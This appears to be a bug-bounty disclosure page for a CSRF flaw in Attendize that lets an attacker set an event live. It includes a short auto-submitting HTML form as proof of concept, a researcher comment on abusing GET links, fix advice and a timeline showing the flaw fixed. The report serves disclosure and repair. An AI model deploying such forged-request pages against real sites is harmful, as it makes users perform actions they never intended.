We've joined Protect AIJoin us over there for bounties up to $50,000+ for vulnerabilities in AI/ML repos

Cross-Site Request Forgery (CSRF) in attendize/attendize

Valid

Reported on

Sep 25th 2021

Description

Attacker is able to make an event live.

Proof of Concept

When you logged in open this POC.html in a browser.

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="Demo URL">
    <input type="submit" value="Submit request" />
</form>
<script>
  document.forms[0].submit();
</script>
</body>
</html>

Impact

This vulnerability is capable of forging user to unintentional mark an event live.

Test

Tested on Safari.

Fix

You should set a CSRF token on such GET requests or you can use POST instead of GET then because of cookie SameSite is Lax, request from other origins could not carry cookie.

We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 years ago
We have contacted a member of the attendize team and are waiting to hear back 2 years ago
We have sent a third and final follow up to the attendize team. This report is now considered stale. 2 years ago
HDVinnie
2 years ago

Researcher

To expand:

One way GET could be abused here is that a person (competitor perhaps:) placed an image tag with src="<your logout link>" ANYWHERE on the internet, and if a user of your site stumbles upon that page, he will be unknowingly logged out.

This is why it should be a POST with a @csrf token.

Johanna Cherry validated this vulnerability 2 years ago
HDVinnie has been awarded the disclosure bounty
The fix bounty is now up for grabs
Johanna Cherry marked this as fixed with commit a2aadf 2 years ago
Johanna Cherry has been awarded the fix bounty
This vulnerability will not receive a CVE
TopNav.blade.php#L10 has been validated
web.php#L326-L328 has been validated
to join this conversation